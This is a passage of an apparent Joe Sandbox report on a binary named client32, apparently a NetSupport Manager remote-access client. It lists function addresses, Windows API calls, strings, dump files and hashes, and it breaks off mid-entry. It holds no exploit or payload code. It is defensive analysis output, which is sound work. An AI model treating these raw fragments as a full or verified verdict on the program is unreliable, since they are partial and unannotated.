                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,AB86ACF8), ref: 1105D59E
                                                                              • SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,AB86ACF8), ref: 1105D5A8
                                                                              Strings
                                                                              • Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                              • String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
                                                                              • API String ID: 3094578987-11999416
                                                                              • Opcode ID: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                              • Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
                                                                              • Opcode Fuzzy Hash: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                              • Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0
                                                                              Function 11153570 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 111535AC
                                                                              • _memmove.LIBCMT ref: 111535E6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                              • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                              • API String ID: 6605023-1396654219
                                                                              • Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                              • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                              • Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                              • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                              Function 110BA560 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowPlacement.USER32(?,0000002C,75BF7AA0), ref: 110BA59F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessagePlacementProcessWindowwsprintf
                                                                              • String ID: ,$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1593395816-618755743
                                                                              • Opcode ID: 437412967ac06f634d2e58aea443df4fd2b5e784e27c5508c7a553b8aec020c5
                                                                              • Instruction ID: 723ecd8509b1f117674e3f28a2eebb62cb0adfa83db23d84f339202074e33124
                                                                              • Opcode Fuzzy Hash: 437412967ac06f634d2e58aea443df4fd2b5e784e27c5508c7a553b8aec020c5
                                                                              • Instruction Fuzzy Hash: 0B01DB79E0021DA7DB10EFB4D862FFDF3A8DB09219F00069EE8065B284DFA16A14C7C4
                                                                              Function 11014310 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateWindowExA.USER32(?,SysHeader32,11195264,?,?,?,?,?,?,?,00000000,00000000), ref: 1101434C
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateErrorExitLastMessageProcessWindowwsprintf
                                                                              • String ID: ..\ctl32\headctrl.cpp$SysHeader32$m_hWnd
                                                                              • API String ID: 2789554107-4050302278
                                                                              • Opcode ID: 1c3010da04db5bed3b6cedd171569ece4558817593313ce3a80e1c51835089e3
                                                                              • Instruction ID: 47ca1da31ef5e317866de86f9591e30fe02a5225a1dd4fd0741b7edf9cd601c6
                                                                              • Opcode Fuzzy Hash: 1c3010da04db5bed3b6cedd171569ece4558817593313ce3a80e1c51835089e3
                                                                              • Instruction Fuzzy Hash: 4C014B7621021ABBCB54DE99DC85EDBB7ADAF88608F008159F919A7240D630E850CBA0
                                                                              Function 11160390 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 1116039F
                                                                              • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 111603C1
                                                                              • TrackPopupMenuEx.USER32(?,?,?,?,00000000,?), ref: 111603ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$InfoItemPopupTrack_memset
                                                                              • String ID: 0
                                                                              • API String ID: 841834121-4108050209
                                                                              • Opcode ID: e8c91e185eb2ebccdcfb0263cef9fd80509c67c6a8282b5119fa71647954d0a1
                                                                              • Instruction ID: 9d224339150c7c133c1660ae8f4408b68bc8455e6129f67dd9b2558d4baf94c6
                                                                              • Opcode Fuzzy Hash: e8c91e185eb2ebccdcfb0263cef9fd80509c67c6a8282b5119fa71647954d0a1
                                                                              • Instruction Fuzzy Hash: CE0146B1910229ABEB04DF94DD49FEBB7BCEB08355F008109F910A7280D7B5A920CBA5
                                                                              Function 1103D1F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,74DF23A0,1100BF7B), ref: 11110928
                                                                                • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                              • _free.LIBCMT ref: 1103D221
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
                                                                              • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                              • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                              Strings
                                                                              • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                              • String ID: Show has overrun too much, aborting
                                                                              • API String ID: 304545663-4092325870
                                                                              • Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                              • Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
                                                                              • Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                              • Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2
                                                                              Function 1101D3C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                              • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              • API String ID: 1136984157-1986719024
                                                                              • Opcode ID: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                              • Instruction ID: 36c1a6ee6805b1b90e48090b7f41ce0c53d42d7852bf61e64861d4a713bbcb04
                                                                              • Opcode Fuzzy Hash: bd8169d8b1d2f1da16aa56a8743fe70e232c658d653b50b5f908e1dbd2e13666
                                                                              • Instruction Fuzzy Hash: E3E0867950022DBFC7149E91DC85EAAF35CEB44269F00C135F96656644D674E84087A4
                                                                              Function 11027530 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23sleepthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnumExitSleepThreadWindows
                                                                              • String ID: TapiFix
                                                                              • API String ID: 1804117399-2824097521
                                                                              • Opcode ID: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                              • Instruction ID: 0d22cb111dc1a1c74f2ece42ee292e751dc76676b098746739fa73436add6467
                                                                              • Opcode Fuzzy Hash: 9b936a382379f1639e294998df4fda084f6c97918e753868017fe61e0b06262c
                                                                              • Instruction Fuzzy Hash: C7E04838A4167CAFE615DB918D84F56BA989B5535CF810030E4351664597B07940C7A9
                                                                              Function 11049130 Relevance: 6.1, APIs: 4, Instructions: 112windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
                                                                                • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
                                                                              • _malloc.LIBCMT ref: 110491DD
                                                                              • _memmove.LIBCMT ref: 110491EA
                                                                              • SendMessageTimeoutA.USER32(?,0000004A,00040270,?,00000002,00001388,?), ref: 11049224
                                                                              • _free.LIBCMT ref: 1104922B
                                                                                • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
                                                                                • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
                                                                                • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
                                                                                • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
                                                                                • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
                                                                              • String ID:
                                                                              • API String ID: 176360892-0
                                                                              • Opcode ID: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                              • Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
                                                                              • Opcode Fuzzy Hash: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                              • Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1
                                                                              Function 1103E140 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNEL32(000001F4,00000000,?,00000000,-111EE49C), ref: 1103E171
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
                                                                              • API String ID: 3472027048-2181447511
                                                                              • Opcode ID: 1415e4d2d896865e18f0d3c242c004084a0b1aa805c802b972be65ad3339b0cf
                                                                              • Instruction ID: d0bdff98c979ad58cf7678b3670661ce36733e83436f59a01fbb5cf7617cac3c
                                                                              • Opcode Fuzzy Hash: 1415e4d2d896865e18f0d3c242c004084a0b1aa805c802b972be65ad3339b0cf
                                                                              • Instruction Fuzzy Hash: 7911E636E0122A9FFB10EBB4DC80FFEB7A89B55309F0002A5E80D97280DE716D41C792
                                                                              Function 11008359 Relevance: 6.1, APIs: 4, Instructions: 68windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
